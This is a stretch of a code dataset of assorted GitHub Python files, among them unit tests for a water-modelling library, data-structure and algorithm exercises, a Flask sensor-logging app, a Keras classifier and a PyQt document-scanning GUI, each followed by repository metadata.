try:\n return int(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to int\"\n )\n\n def to_float(self, value):\n try:\n return float(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to float\"\n )\n\n def to_bool(self, value):\n try:\n return bool(value)\n except ValueError:\n return SLValueError(\n self.context, \"argument 'value' cannot be converted to bool\"\n )\n\n def to_string(self, value):\n return self._print([value])\n","repo_name":"sertdfyguhi/shitlang","sub_path":"shitlang/builtins/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"16999485421","text":"import time\nimport unittest\n\nimport numpy as np\n\nfrom ai4water import Model\nfrom ai4water.datasets import busan_beach\nfrom ai4water.postprocessing.explain import PermutationImportance\n\n\ndata=busan_beach()\n\nclass TestPermImportance(unittest.TestCase):\n\n def test_one_2d_input(self):\n model = Model(model=\"XGBRegressor\", verbosity=0)\n model.fit(data=data)\n x_val, y_val = model.validation_data()\n\n pimp = PermutationImportance(\n model.predict,\n x_val,\n y_val.reshape(-1,))\n fig = pimp.plot_1d_pimp(show=False)\n assert fig.__class__.__name__ == \"AxesSubplot\"\n fig = pimp.plot_1d_pimp(show=False, plot_type=\"bar_chart\")\n assert fig.__class__.__name__ == \"AxesSubplot\"\n\n return\n\n def test_one_3d_input(self):\n time.sleep(1)\n beach_data = data\n model = Model(\n model={\"layers\": {\n \"LSTM\": 32,\n \"Dense\": 1\n }},\n input_features=beach_data.columns.tolist()[0:-1],\n output_features=beach_data.columns.tolist()[-1:],\n ts_args={\"lookback\": 5},\n verbosity=0\n )\n\n model.fit(data=beach_data)\n\n x, y = model.training_data()\n\n pimp = PermutationImportance(model.predict, inputs=x, target=y.reshape(-1, ),\n n_repeats=4,\n verbose=False)\n axes = pimp.plot_as_heatmap(annotate=False, show=False)\n assert axes.__class__.__name__ == \"AxesSubplot\"\n\n pimp.plot_1d_pimp(show=False)\n\n return\n\n def test_two_3d_input(self):\n model = Model(\n model={\"layers\": {\n \"Input_0\": {\"shape\": (5, 4)},\n \"Input_1\": {\"shape\": (5, 3)},\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"Input_0\", \"Input_1\"]},\n \"LSTM\": 32,\n \"Dense\": 1\n }},\n verbosity=0\n )\n\n x1 = np.random.random((100, 5, 4))\n x2 = np.random.random((100, 5, 3))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), verbose=0)\n assert len(pimp.importances) == 2\n assert len(pimp.importances[0]) == 5\n assert len(pimp.importances[1]) == 5\n return\n\n def test_one_2d_and_one_3d_input(self):\n model = Model(\n model={\"layers\": {\n \"Input_0\": {\"shape\": (5, 4)},\n \"LSTM\": {\"config\": 32,\n \"inputs\": \"Input_0\"},\n\n \"Input_1\": {\"shape\": (4,)},\n \"Dense_0\": {\"config\": 8,\n \"inputs\": \"Input_1\"},\n\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"LSTM\", \"Dense_0\"]},\n \"Dense\": 1\n }},\n verbosity=0,\n )\n\n x1 = np.random.random((100, 5, 4))\n x2 = np.random.random((100, 4))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), verbose=0)\n assert len(pimp.importances) == 2\n assert len(pimp.importances[0]) == 5\n assert pimp.importances[1].shape == (4, 14)\n return\n\n def test_two_2d_inputs(self):\n model = Model(model={\"layers\": {\n \"Input_0\": {\"shape\": (5,)},\n \"Input_1\": {\"shape\": (3,)},\n \"Concatenate\": {\"config\": {\"name\": \"Concat\"},\n \"inputs\": [\"Input_0\", \"Input_1\"]},\n \"Dense_0\": {\"config\": 8,\n \"inputs\": \"Concat\"},\n \"Dense_1\": 1}},\n ts_args={'lookback':1},\n verbosity=0\n )\n x1 = np.random.random((100, 5))\n x2 = np.random.random((100, 3))\n pimp = PermutationImportance(model.predict, [x1, x2], np.random.random((100, 1)), verbose=0)\n fig = pimp.plot_1d_pimp(show=False)\n\n assert fig.__class__.__name__ == \"AxesSubplot\"\n return\n\nif __name__ == \"__main__\":\n\n unittest.main()\n","repo_name":"lyh910926/AI4Water","sub_path":"tests/test_postprocessing/test_perm_imp.py","file_name":"test_perm_imp.py","file_ext":"py","file_size_in_byte":4074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"4951077795","text":"class Node:\n def __init__(self, value, next = None, previous = None):\n self.value = value\n self.next = next\n self.previous = previous\n \n\nclass DList:\n\n def __init__(self) :\n self.header = None\n \n \n\n def add_to_front(self, value):\n newNode = Node(value)\n \n if self.header == None:\n self.header = newNode\n return self\n \n \n newNode.next = self.header\n self.header.previous = newNode\n self.header = newNode\n\n return self\n \n def print_values(self):\n runner = self.header\n while runner != None:\n print (runner.value)\n runner = runner.next\n \n def add_to_back(self, value):\n newNode = Node(value)\n\n if self.header == None:\n self.header = newNode\n return self\n \n runner = self.header\n\n while runner.next != None:\n runner = runner.next\n \n newNode.previous = runner\n runner.next = newNode\n return self\n\n def add_value_by_index(self, value, index): \n newNode = Node(value)\n if self.header == None:\n self.header = newNode\n return self\n \n runner = self.header\n i = 0\n\n while index != i:\n runner = runner.next\n i +=1\n if runner == None and i != index:\n print('index not found')\n return self\n\n if runner == None:\n self.add_to_back(newNode.value)\n return self\n else:\n newNode.next = runner\n newNode.previous = runner.previous\n runner.previous = newNode\n newNode.previous.next = newNode\n return self\n\n \n\n\n\n\n\n\n\n \n\n\nmyList = DList()\n\n# myList.add_to_front(12)\n# myList.add_to_front(10)\nmyList.add_to_back(\"back\")\nmyList.add_to_front(\"front\")\nmyList.add_value_by_index(\"Middle\",2)\nmyList.print_values()\n \n \n\n \n","repo_name":"reubencj/python-stack","sub_path":"fundamentals/extras/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72417717230","text":"#상하좌우 문제\r\n\r\n#n 입력 받기\r\nn= int(input())\r\n\r\nx,y=1,1\r\n\r\nplans = input().split()\r\n\r\n#L,R,U,D에 따른 이동 방향\r\ndx=[0,0,-1,1]\r\ndy=[-1,1,0,0]\r\n\r\nmove_types = ['L','R','U','D']\r\n\r\n#이동계획\r\nfor plan in plans:\r\n #이동후 좌표 구하기\r\n for i in range(len(move_types)):\r\n if plan == move_types[i]:\r\n nx = x +dx[i]\r\n ny = y+ dy[i]\r\n #공간 벗어나는 경우 무시\r\n if nx < 1 or ny < 1 or nx > n or ny > n:\r\n continue\r\n #이동수행\r\n x,y = nx,ny\r\n\r\nprint(x,y)\r\n","repo_name":"goodpinokio/Data_Structure-Python-","sub_path":"문제/problem(1_i).py","file_name":"problem(1_i).py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"5891786848","text":"def moyenne(tab: list) -> float: # similaire au sujet 28\r\n \"\"\"\r\n moyenne(list) -> float\r\n Entrée : un tableau non vide d'entiers\r\n Sortie : nombre de type float\r\n Correspondant à la moyenne des valeurs présentes dans le\r\n tableau\r\n \"\"\"\r\n assert type(tab) == list and tab != [], \"tab doit etre un tableau non vide\"\r\n # solution facile : return sum(tab) / len(tab)\r\n total = 0\r\n for element in tab:\r\n total += element\r\n return total / len(tab)\r\n\r\n\r\ndef dichotomie(tab, x):\r\n \"\"\"\r\n tab : tableau trie dans l'ordre croissant\r\n x : nombre entier\r\n La fonction renvoie True si tab contient x et False sinon\r\n \"\"\"\r\n # cas du tableau vide\r\n if tab == []:\r\n return False, 1\r\n\r\n # cas ou x n'est pas compris entre les valeurs extremes\r\n if (x < tab[0]) or (x > tab[-1]):\r\n return False, 2\r\n\r\n debut = 0\r\n fin = len(tab) - 1\r\n while debut <= fin:\r\n m = (debut + fin) // 2 # milieu\r\n if x == tab[m]:\r\n return True\r\n if x > tab[m]:\r\n debut = m + 1\r\n else:\r\n fin = m - 1\r\n return False, 3 # troisieme cas renvoyant False","repo_name":"emsquid/epreuves-pratiques-nsi","sub_path":"Sujet 35/22-NSI-35.py","file_name":"22-NSI-35.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"fr","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"29825771256","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits import mplot3d\n\ndef parse_location(tgt_dir):\n\n # location_list = np.empty((0,2), dtype=np.float64)\n location_list = []\n all_location = sorted(os.listdir(tgt_dir))\n\n for loc in all_location:\n hold_arr = []\n for line in open(loc):\n if 'longitude' in line:\n splitval = line.split(sep='\\\"')\n float_split_long = float(splitval[3])\n hold_arr.append(float_split_long)\n\n if 'latitude' in line:\n splitval = line.split('\\\"')\n float_split_lat = float(splitval[3])\n hold_arr.append(float_split_lat)\n\n if 'altitude' in line:\n splitval = line.split('\\\"')\n float_split_alt = float(splitval[3])\n # hold_arr.append(float_split_alt)\n hold_arr.append(60.0)\n # print(hold_arr[0], \",\", hold_arr[1])\n location_list.append(hold_arr)\n\n return location_list\n\ncurrentPath = os.getcwd()\ndatadir = currentPath + '/sample_metadata'\n\nprint(datadir)\nos.chdir(datadir)\nlocation_list = parse_location(datadir)\n\nnp_loc_list = np.array(location_list, dtype=np.float64)\n\nprint(np_loc_list.shape)\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\nxdata = np_loc_list[:,0]\nydata = np_loc_list[:,1]\nzdata = np_loc_list[:,2]\n\nprint(xdata)\n\n# ax.set_box_aspect((np.ptp(xdata), np.ptp(ydata), np.ptp(zdata)))\n\nax.scatter3D(zdata, ydata,xdata, c=xdata, cmap='tab10')\n\nplt.savefig('output.png')\n","repo_name":"Walla-B/DTMS","sub_path":"parse_data.py","file_name":"parse_data.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17312894784","text":"from collections import re\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n # if len(s)<1 or len(s)>2*10**5 or not s.isascii():\n # return \n# TO:DO check if i is printable. i.isprintable()\n# remove non alphanumeric characters\n newStr= re.sub(r'[^a-zA-Z0-9]','',s).lower()\n # two pointers, one starts at the end the other one starts at the begining\n start,end=0,len(newStr)-1\n while start<=end:\n if newStr[start] != newStr[end]:\n return False\n start+=1\n end-=1\n return True","repo_name":"leonkoech/DataStructures-Algos","sub_path":"Data Structures/arrays/isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25103737188","text":"import pandas as pd\nimport numpy as np\nimport datetime as dt\nimport csv\n\n\ndef data_strip(df, league, rounds, date_current):\n \n if league == 0: \n df = df[df['league'] == 'Barclays Premier League']\n elif league == 1:\n df = df[df['league'] == 'Danish SAS-Ligaen']\n\n\n # Convert date into datetime\n old_dates = df['date'].unique()\n\n for od in old_dates:\n text = od.split('-')\n date = dt.datetime(int(text[0]), int(text[1]), int(text[2]))\n df = df.replace(od, date)\n\n # Remove previous rounds\n df = df[df['date'] > date_current]\n \n return df\n\n\n\ndef get_data(df, teams, rounds, decimals):\n header = [\"Round\", \"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\"]\n db = []\n\n print(\"%4s\" % \"Team\", end =\" \")\n for i in range(rounds):\n print(\"%-4d\" % (i+1), end =\" \")\n print(\"%-4s\" % \"avg\") \n \n with open('./data.csv', 'w', encoding='UTF8', newline='') as f:\n \n writer = csv.writer(f)\n writer.writerow(header)\n\n for team in teams:\n odds = [team.arc]\n opps = []\n data = [team.arc]\n \n df2 = df\n df2 = df2[(df2['team1'] == team.name) | (df['team2'] == team.name)]\n \n # Relevant games after start-date\n df2 = df2[0:rounds]\n \n for i in range(rounds): \n if df2.iloc[i]['team1'] == team.name:\n odds.append(df2.iloc[i]['prob1'])\n data.append(str(df2.iloc[i]['prob1']).replace('.',','))\n opps.append(df2.iloc[i]['team2'])\n else:\n odds.append(df2.iloc[i]['prob2'])\n data.append(str(df2.iloc[i]['prob2']).replace('.',','))\n opps.append(df2.iloc[i]['team1'])\n \n writer.writerow(data)\n odds.append( round(np.mean(odds[1:]) * decimals) / decimals )\n \n db.append(odds)\n \n f.close()\n \n return db\n\n\n\ndef print_data(db, rounds):\n db.sort(key=lambda row: (row[-1]), reverse=True)\n\n for item in db:\n print(\"%-4s\" % item[0], end =\" \")\n for i in range(rounds):\n print(\"%-0.2f\" % item[i+1], end =\" \")\n print(\"%-0.2f\" % item[-1]) \n","repo_name":"MHVandborg/BotHoldet","sub_path":"files/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2221316905","text":"from django.urls import path\n\nfrom .views import CustomerDetailView, CustomerListView,ProductListView,ProductDetailView,OrderDetailView,OrderListView,AddToCartView\n\n\n\nurlpatterns =[\n path (\"Customer/\",CustomerListView.as_view(), name = \"customer_list_view\"),\n path(\"Customer//\",CustomerDetailView.as_view(), name = \"customer_detail_view\"),\n path(\"Product/\",ProductListView.as_view(),name = \"product_list_view\"),\n path(\"Product//\",ProductDetailView.as_view(), name = \"product_detail_view\"),\n path(\"Order/\",OrderListView.as_view(),name=\"order_list_view\"),\n path(\"Order//\",OrderDetailView.as_view(),name=\"order_detail.view\"),\n path(\"add_to_cart\",AddToCartView.as_view(),name = \"add_to_cart\")\n]","repo_name":"MariaGKimani/Green_kiosk","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72964898032","text":"import numpy as np\nimport keras\nfrom keras.models import Sequential #= linear stack of layers\nfrom keras.layers import Dense #every node from one layer connected to every node in next layer\nfrom keras.optimizers import Adam # adaptive optimization algorithm \n#stochastic gradient descent\n#computes adaptive learning rates\n#srecommended algorithm to be used\nimport matplotlib.pyplot as plt\n\nn_pts = 500\nnp.random.seed(0)\nXa = np.array([np.random.normal(13, 2, n_pts),\n np.random.normal(12, 2, n_pts)]).T\nXb = np.array([np.random.normal(8, 2, n_pts),\n np.random.normal(6, 2, n_pts)]).T\n \nX = np.vstack((Xa, Xb))\ny = np.matrix(np.append(np.zeros(n_pts), np.ones(n_pts))).T\n \nplt.scatter(X[:n_pts,0], X[:n_pts,1])\nplt.scatter(X[n_pts:,0], X[n_pts:,1])\n\nmodel = Sequential()\nmodel.add(Dense(units=1,input_shape = (2,),activation = 'sigmoid')) #add layers to NN\n#only 2 inputs (x1,x2)\nadam = Adam(lr = 0.1) #minimize error to 0.1\n#configure learnung process\nmodel.compile(adam, loss='binary_crossentropy', metrics = ['accuracy'])\n#pass in training data, pass in labels assigned to data points :\nhist = model.fit(x=X,y=y,verbose=1,batch_size=50,epochs = 10, shuffle = 'true') \n#0 top region, 1 bottom region\n# it's important to pass in labels to know if we classified correctly\n#batch_size* iterations to get to number of points = n_pts\n#amount of epochs is important to avoid overfitting or underfitting\n#shuffle makes sure to not get stuck in local minimum by shuffling subsets\n\nplt.plot(hist.history['acc'],label = 'accuracy')\nplt.plot(hist.history['loss'],label = 'loss')\nplt.title('accuracy and loss ')\nplt.xlabel('Epoch')\nplt.legend(loc = 'upper right')\n","repo_name":"Cedric-Perauer/Code-Dump","sub_path":"Python/Useful/Classifier/Classifier_Short_Version.py","file_name":"Classifier_Short_Version.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73082211630","text":"class Solution:\n def shifted_binary_search(self, pivot: int, target: int, nums: List[int]) -> int:\n shift = self.n - pivot\n left, right = (pivot + shift) % self.n, (pivot - 1 + shift) % self.n\n \n while left <= right:\n mid = left + ((right - left) >> 1)\n if nums[(mid - shift) % self.n] == target:\n return (mid - shift) % self.n\n elif nums[(mid - shift) % self.n] > target:\n right = mid - 1\n else:\n left = mid + 1\n \n return -1\n \n def search(self, nums: List[int], target: int) -> int:\n self.n = len(nums)\n left, right = 0, self.n - 1\n \n while left <= right:\n mid = left + ((right - left) >> 1)\n if nums[mid] > nums[-1]:\n left = mid + 1\n else:\n right = mid - 1\n \n return self.shifted_binary_search(left, target, nums)","repo_name":"AndanteKim/LeetCode_Practice","sub_path":"0033-search-in-rotated-sorted-array/0033-search-in-rotated-sorted-array.py","file_name":"0033-search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"18383953101","text":"import itertools\nx = \"\"\nn = int(input())\ncct = \"A\"\ncircuitA = []\ncircuitB = []\nwhile x != \"poB\":\n circuit = list(map(str, input().strip().split()))\n if(circuit[0] == \"CircuitA\"):\n cct = \"A\"\n continue\n elif(circuit[0] == \"CircuitB\"):\n cct = \"B\"\n continue\n \n if(cct == \"A\"):\n circuitA.append(circuit)\n elif(cct == \"B\"):\n circuitB.append(circuit)\n\n x = circuit[0]\n\n \n\ndef evaluateOneCct(cct,INPUT,logicDict):\n \n # print(cct,INPUT)\n\n for i in range(len(cct)):\n if(len(cct[i]) > 1):\n if(str(cct[i])[:2] == \"pi\"):\n # cct[i] = INPUT[int(cct[i][2:].strip())]\n cct[i] = \"True\"\n if(str(cct[i])[:3] == \"~pi\"):\n \n # cct[i] = \"not \" + INPUT[int(cct[i][3:].strip())]\n cct[i] = \"True\"\n # print(cct[i])\n \n \n return cct[0], True\n\n\n operation = cct[1]\n if(operation not in [\"and\",\"or\",\"xor\",\"nand\",\"nor\",\"xnor\", \"not\", \"buf\"]):\n return cct[0], True\n\n if(operation == \"xnor\"):\n operation = \"xor\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n elif(operation == \"nand\"):\n operation = \"and\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n elif(operation == \"nor\"):\n operation = \"or\"\n exp = \"not \" + (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n\n else:\n exp = (\" \" + operation + \" \").join(list(map(str,cct[2:])))\n\n \n\n exp = exp.replace('xor', '^').replace('~', 'not ')\n for key in logicDict:\n exp = exp.replace(key, str(logicDict[key]))\n\n if(operation == \"not\"):\n exp = \"not \" + exp\n solution = eval(exp)\n # print(exp, \" = \",solution)\n return cct[0], solution\n\ndef evaluateCct(circuit,INPUT):\n logicDict = {}\n for cct in circuit:\n # print(cct)\n out, solution = evaluateOneCct(cct[:],INPUT,logicDict)\n logicDict[out] = solution\n # print(logicDict)\n return logicDict\n\n\n# print(evaluateCct(circuitA,INPUT))\n\nINPUTS = list(itertools.product([\"True\", \"False\"], repeat=n))\n\nrslt = []\nfor INPUT in INPUTS:\n\n outA = evaluateCct(circuitA,INPUT) \n outB = evaluateCct(circuitB,INPUT)\n # print(INPUT, outA[\"poA\"],outB[\"poB\"])\n rslt.append(outA[\"poA\"] == outB[\"poB\"])\n \n\n# print(rslt)\nif(rslt.count(True) == len(rslt)):\n print(\"Identical\")\nelif(rslt.count(False) == len(rslt)):\n print(\"Inverse\")\nelse:\n print(\"None\")\n\n# INPUT = [\"False\", \"False\", \"False\", \"False\"]\n# outB = evaluateCct(circuitB,INPUT)","repo_name":"chamikagangul/Data-Structures-and-Algorithms","sub_path":"test/cpp workshop/Two Circuits.py","file_name":"Two Circuits.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71127340912","text":"'''\nYou are given a sorted list of distinct integers from 0 to 99,\nfor instance [0, 1, 2, 4, 50, 52, 75].\nYour task is to produce a string that describes numbers missing from the list;\nin this case \"3,5-49,51,53-74,76-99\". The items should be sorted in ascending order\nand separated by commas when a gap spans only one number. When a gap is longer,\nthe item comprises the start and the end of the gap, joined with a minus sign.\n'''\nfrom typing import List\n\nclass Solution:\n def listMissingIntegers(self, nums: List[int]) -> str:\n res = \"\"\n i = 1\n # the beginning\n if nums[0] != 0:\n res = res + str(0) + \",\"\n\n while i < len(nums):\n if nums[i] - nums[i - 1] == 2:\n res = res + str((nums[i - 1] + 1)) + \",\"\n elif nums[i] - nums[i - 1] > 2:\n res = res + str((nums[i - 1] + 1)) + \"-\" + str((nums[i] - 1)) + \",\"\n i += 1\n\n # the ending\n if nums[i - 1] != 99:\n if 99 - nums[i - 1] == 2:\n res = res + str((nums[i - 1] + 1)) + \",\"\n elif 99 - nums[i - 1] > 2:\n res = res + str((nums[i - 1] + 1)) + \"-\"\n res = res + str(99)\n else:\n res = res[:-1]\n\n return res\n\ns = Solution()\nnums = [1, 2, 4, 50, 52, 75, 97, 98, 99]\nprint(s.listMissingIntegers(nums))","repo_name":"geotransformer/python3","sub_path":"pythoncode/Classic/MissingIntegerSortedArrayList.py","file_name":"MissingIntegerSortedArrayList.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19817911399","text":"import time\nfrom datetime import date, datetime, timedelta\nfrom flask import Flask, render_template, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import and_\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.orm import contains_eager\nfrom itertools import tee\n\napp = Flask(__name__,template_folder=\"./dist/templates\",static_folder=\"./dist/static\")\n\napp.config.from_object('config.default')\napp.url_map.strict_slashes = False\napp.url_map.strict_slashes = False\n\ndb = SQLAlchemy(app)\n\nfrom models import Sensor, SensorData\n\n@app.route(\"/\", defaults={'timerange': 24})\n@app.route(\"/\")\ndef index(timerange):\n upper = datetime.now()\n then = datetime(2000, 1, 1)\n if timerange > 0:\n then = upper - timedelta(hours=timerange)\n sensors = Sensor.query.join(Sensor.data).options(contains_eager(Sensor.data)).filter(SensorData.date.between(time.mktime(then.timetuple()), time.mktime(upper.timetuple()))).all()\n return render_template('index.html', sensors=sensors)\n\n@app.route(\"/data//////\", methods=['GET', 'POST'])\ndef data(temp, hum, pres, pm2_5, pm10, pwd):\n if pwd == app.config['PASS']:\n now = datetime.now()\n sensor_names = ['temp', 'hum', 'pres', 'PM 2.5', 'PM 10']\n sensor_units = ['°C', '%', 'hPa', 'μg /m³', 'μg /m³']\n values = [temp, hum, pres, pm2_5, pm10]\n\n for (sensor_name, unit, value) in zip(sensor_names, sensor_units, values):\n sensor = Sensor.query.filter_by(name = sensor_name).first()\n if sensor is None:\n sensor = Sensor(name = sensor_name, unit = unit)\n db.session.add(sensor)\n db.session.commit()\n\n data = SensorData(date = time.mktime(now.timetuple()), value = value)\n sensor.data.append(data)\n db.session.add(data)\n db.session.commit()\n return redirect(\"/\", code=303)\n\n@app.before_first_request\ndef create_tables():\n db.create_all()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"krzyz/sensor-data","sub_path":"sensor_data.py","file_name":"sensor_data.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18117315075","text":"import requests\nimport pandas as pd\n\ndef gen_url(attribute):\n\n df = pd.read_csv('amazon_scrapy/amazon_scrapy/spiders/crawl_results.csv')\n subdf = df[df['query'].str.contains(attribute)]\n urllist = []\n for index, row in subdf.iterrows():\n base_url = \"https://www.amazon.com/\"\n static = 'dp/'\n asin = row.asin\n url = base_url + static + asin\n html = requests.get(url)\n if html.status_code != 404:\n #print(url, end=' ')\n urllist.append(url)\n #print(\"\")\n #print(urllist)\n return urllist\n","repo_name":"arontaupe/ruminations","sub_path":"url_generator.py","file_name":"url_generator.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22122181699","text":"#!/usr/bin/python3\n# This Python file uses the following encoding: utf-8\n\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton, QComboBox, QDialog, QFileDialog, QMessageBox, QCompleter, QProgressDialog, QProgressBar\nfrom PyQt5 import uic\nfrom PyQt5.QtCore import QProcess, QSettings, QThreadPool, pyqtSignal, pyqtSlot, Qt\nfrom PyQt5.QtGui import QPixmap, QImage\n\nimport sys\nimport time\nimport sane\nfrom urllib.request import urlopen\nimport bs4\nimport glob\nimport os, io\nfrom PIL import ImageEnhance\nimport ocrtools as ocrt\nimport tempfile\n\n\nfrom ui_dialog import Ui_Dialog\nfrom multithread import Worker, WorkerSignals\nfrom imagecalibrate import ConfigWindow\n\n#from ui_mainwindow import Ui_MainWindow\nimport resources\n\n\n\ntry:\n os.chdir(sys._MEIPASS)\n print(sys._MEIPASS)\nexcept:\n pass\n\nXML_PATH = '/hp/device/notifications.xml'\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n\n \n self.mode = ['lineart','gray','color']\n self.resolution = ['75','100','150','200','300','600','1200']\n self.compression = ['None','JPEG']\n self.scanFolder = os.getcwd()\n self.ver = sane.init()\n \n self.ui = uic.loadUi(\"mainwindow.ui\", self)\n #self.ui = Ui_MainWindow()\n #self.ui.setupUi(self)\n \n self.dialog = QDialog()\n self.message = QMessageBox()\n \n self.threadpool = QThreadPool()\n\n self.settings = QSettings(\"bibuweb.de\",\"Scan2Folder\")\n\n self.progressBar = None\n\n #self.configWin = ConfigWindow(self)\n #self.configWin.ui.scanButton.clicked.connect(self.configScan)\n \n\n \n self.ui.resolutions.addItems(self.resolution)\n self.ui.resolutions.setCurrentIndex(self.ui.resolutions.findText('300'))\n\n self.ui.btnOpenDir.clicked.connect(self.openDir)\n self.ui.btnStartscan.clicked.connect(self.startScanJob)\n self.ui.btnOcr.clicked.connect(self.ocr2pdf)\n ## for testing enable button\n self.ui.btnOcr.setEnabled(True)\n\n self.ui.actionCalibrate.triggered.connect(self.configureWindow)\n #self.configWin.ui.saveButton.clicked.connect(self.saveConfig)\n\n\n # Change Color back after error\n self.ui.filename.cursorPositionChanged.connect(self.leditcolor)\n\n self.ui.scanpath.cursorPositionChanged.connect(self.leditcolor)\n self.ui.scanpath.textChanged.connect(self.scanPathCanged)\n\n self.is_dev = True\n self.dev_available = False\n self.dev_connected = False\n self.adf = False\n self.dev = None\n self.devices = []\n self.scanStatus = False\n self.btnStyle = \"\"\n\n self.contrast = 1\n self.brightness = 1\n self.color = 1\n self.sharpness = 1\n self.gamma = 1\n self.scanPath = \"\"\n self.ocr = False\n self.crop = False\n self.cropSize = {'left':1,'top':1,'width':1,'height':1}\n self.ocrFiles = []\n self.tempocr = None\n self.configWin = None\n self.defaultGroup = self.settings.value(\"defaultGroup\")\n\n self.getSettings(self.defaultGroup)\n #if len(self.scanPath) > 1:\n # self.createCompleter()\n\n self.ui.cmbBoxOcr.addItem(\"default\")\n self.ui.cmbBoxOcr.addItems(self.settings.childGroups())\n\n\n if self.defaultGroup == \"\":\n self.ui.cmbBoxOcr.setCurrentText(\"default\")\n else:\n self.ui.cmbBoxOcr.setCurrentText(self.defaultGroup)\n\n self.ui.cmbBoxOcr.currentIndexChanged.connect(self.profileChanged)\n\n def getSettings(self, group):\n print(self.settings.childGroups())\n self.settings.beginGroup(group)\n print(self.settings.group())\n\n\n if self.settings.contains(\"ocr\"):\n if self.settings.value('ocr') == 'true':\n self.ocr = True\n self.ui.actionEnable_OCR.setChecked(True)\n else:\n self.ui.actionEnable_OCR.setChecked(False)\n ## connect Signal here and not before loading settings\n ## if not, you never will get the stored value because QAction is triggered when ever the value changed\n\n if self.settings.contains('crop'):\n if self.settings.value('crop') == 'true':\n self.crop = True\n\n if self.settings.contains('cropSize'):\n #print(self.settings.value('cropSize'))\n self.cropSize = self.settings.value('cropSize')\n\n\n if self.settings.contains(\"path\"):\n self.ui.scanpath.setText(self.settings.value(\"path\"))\n self.scanPath = self.settings.value(\"path\")\n self.createCompleter()\n \n if self.settings.contains('contrast'):\n self.brightness = self.settings.value('brightness')\n \n self.contrast = self.settings.value('contrast')\n\n if self.settings.contains('color'):\n self.color = self.settings.value('color')\n\n if self.settings.contains(\"sharpness\"):\n self.sharpness = self.settings.value('sharpness')\n\n if self.settings.contains(\"gamma\"):\n self.gamma = self.settings.value('gamma')\n\n self.settings.endGroup()\n\n def setConfigWinSettings(self):\n\n self.configWin.ui.profileSelect.clear()\n self.configWin.ui.profileSelect.addItem(\"default\")\n self.configWin.ui.profileSelect.addItems(self.settings.childGroups())\n\n\n\n if self.defaultGroup == \"\":\n self.configWin.ui.profileSelect.setCurrentText(\"default\")\n else:\n self.configWin.ui.profileSelect.setCurrentText(self.defaultGroup)\n\n if self.settings.contains(\"ocr\"):\n if self.settings.value('ocr') == 'true':\n self.configWin.ui.OCR_Enabled.setChecked(True)\n self.configWin.ui.OCR_Box.setEnabled(True)\n\n else:\n self.configWin.ui.OCR_Enabled.setChecked(False)\n self.configWin.ui.OCR_Box.setEnabled(False)\n ## connect Signal here and not before loading settings\n ## if not, you never will get the stored value because QAction is triggered when ever the value changed\n self.configWin.ui.OCR_Enabled.stateChanged.connect(self.ocrConfig)\n\n if self.settings.contains('crop'):\n self.configWin.ui.checkCrop.setChecked(self.crop)\n\n if self.settings.contains('cropSize'):\n self.configWin.ui.cropX.setValue(self.cropSize['left'])\n 